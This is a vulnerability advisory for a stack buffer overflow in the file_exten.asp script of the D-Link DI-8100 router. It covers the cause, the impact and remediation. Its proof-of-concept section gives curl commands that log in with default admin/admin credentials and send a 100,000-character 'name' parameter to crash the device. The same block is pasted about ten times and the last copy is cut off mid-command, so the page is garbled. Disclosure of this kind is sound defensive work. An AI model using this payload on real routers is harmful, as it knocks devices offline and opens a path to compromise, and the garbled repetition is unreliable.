D-Link DI-8100 file_exten.asp Stack Buffer Overflow Vulnerability Analysis

# Vulnerability Summary: DI-8100 Router file_exten.asp Stack Buffer Overflow ## 1. Vulnerability Overview * **Vulnerability Type**: Stack-based Buffer Overflow (CWE-121) * **Affected Component**: The `file_exten.asp` CGI script in DI-8100 router firmware (`/cgi-bin/file_exten.asp`) * **Trigger Condition**: When processing file extension configuration operations (`opt=add` or `opt=mod`) with an overly long string passed to the `name` parameter. * **Root Cause**: The function in `file_exten.asp` uses `sprintf` to directly copy the user-provided `name` parameter (`parm_12`) into a stack buffer without length validation. An attacker can exploit this vulnerability to overwrite critical control data on the stack (e.g., return address and saved frame pointer under MIPS architecture). ## 2. Impact Scope * **Vendor**: D-Link (OEM manufacturer of DI-8100) * **Product**: DI-8100 Multi-WAN VPN Router * **Firmware Version**: Confirmed present in analyzed version (specific version not specified, but may affect all currently released versions) * **Attack Vector**: * **Remote**: Yes (via HTTP POST request) * **Authentication**: Required (valid administrator session) * **Attack Path**: POST request to `/file_exten.asp` with `opt=add` or `opt=mod` and an oversized `name` parameter. * **Potential Consequences**: Arbitrary code execution, full device compromise, Denial of Service (DoS), or lateral movement within the network. ## 3. Remediation * **Recommendation**: Fix the logic handling the `name` parameter in the `file_exten.asp` script by enforcing strict length validation before copying user input into buffers. Avoid unsafe functions such as `sprintf`; use length-limited alternatives (e.g., `snprintf`). * **Temporary Mitigation**: If immediate patching is not possible, restrict access to `/cgi-bin/file_exten.asp` and ensure only authorized administrators can reach this interface. ## 4. Proof-of-Concept (PoC) Code ```python TARGET="192.168.0.1" curl -c /tmp/cookie -d "user=admin&password=admin" "http://$TARGET/login.cgi" PAYLOAD=$(python -c 'print("A"*100000)') curl -X POST "http://$TARGET/file_exten.asp" -b /tmp/cookie -d "opt=add&name=$PAYLOAD" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http://192.168.0.1/login.cgi" -d "user=admin&password=admin" curl -X POST "http://192.168.0.1/file_exten.asp" -b cookies.txt -d "opt=add&name=$(python -c 'print("A"*100000)')" ``` ```bash # CVE-DI-8100-file_exten_sprintf curl -c cookies.txt -d "user=admin&password=admin" "http:

Goal Reached Thanks to every supporter — we hit 100%!

D-Link DI-8100 file_exten.asp Stack Buffer Overflow Vulnerability Analysis

More from this source